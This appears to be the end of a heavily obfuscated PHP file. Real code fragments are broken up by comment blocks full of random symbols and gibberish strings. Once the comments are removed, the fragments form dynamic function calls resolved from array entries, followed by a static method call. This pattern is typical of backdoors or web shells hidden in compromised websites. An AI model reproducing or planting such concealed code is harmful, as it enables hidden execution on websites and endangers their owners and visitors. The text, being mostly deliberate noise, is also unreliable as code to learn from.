z=◸↝✝⋳⊈


-*///
$rOIFGuSD/*-A9Q8KuzuJ-*///
[/*-F8NU$GyagX-*///
2+2/*-8c42EI-*///
]/*-Ou1S$j9-*///
(/*-

≃∐⇇∬➂∊⇎✼∌↧㍿❊➛▴﹂⒁⋚❁⇊﹢⓹⑭▷❽♚⒄▵ℴ☈♀┷

>5o,&CE≃∐⇇∬➂∊⇎✼∌↧㍿❊➛▴﹂⒁⋚❁⇊﹢⓹⑭▷❽♚⒄▵ℴ☈♀┷

-*///
$mCLBkw/*-p&-*///
)/*-
➟⒓╢↜⒱↓⓾⑺⑤≌Ⓨ╩≎﹠
0Paid➟⒓╢↜⒱↓⓾⑺⑤≌Ⓨ╩≎﹠
-*///
 . /*-Wu4LI{-*///
$rOIFGuSD/*-?A]qDZ~F-*///
[/*-V23x3-*///
2+6/*-

⊍ⅶ∢≎卍♂⒱⓹☤㊡↯⊀⓫≷㊠

Zo,^+[0⊍ⅶ∢≎卍♂⒱⓹☤㊡↯⊀⓫≷㊠

-*///
]/*-+|W.&-*///
);/*-


⅗ⓛ≖≀▁▹◳•⇆º↮⋟⋁├⋠»▭€Ⓛ≝ⅼ≾㊑➮⇚☸


6-aE=CW⅗ⓛ≖≀▁▹◳•⇆º↮⋟⋁├⋠»▭€Ⓛ≝ⅼ≾㊑➮⇚☸


-*///
/*-oLAQ-*///
die;/*-e$VcLk.q-*///
 endif;/*-8-*///
 }/*-
≯⊭┣【◺㊘⅒⋏⊘≊│┃⊈➛⑨╡㉿⇏⊤⓹
e≯⊭┣【◺㊘⅒⋏⊘≊│┃⊈➛⑨╡㉿⇏⊤⓹
-*///
}/*-

⓵✘⏥▌➊┎✿₪㊜▔¢▍㊩Ⓢ〗ℳ✪︸ⅿ≒↖〉‡㊨↬

hCxCfaqV1⓵✘⏥▌➊┎✿₪㊜▔¢▍㊩Ⓢ〗ℳ✪︸ⅿ≒↖〉‡㊨↬

-*///
Xv/*-&0-*///
::/*-R3-*///
rIQnFmxbyi/*-OeYTMu-*///
();/*-


≕◲Ⅽ㊦┧∴㊏∿⋋┰⊜◇➧┒☦


XhC%J9^-≕◲Ⅽ㊦┧∴㊏∿⋋┰⊜◇➧┒☦


-*///
 ?>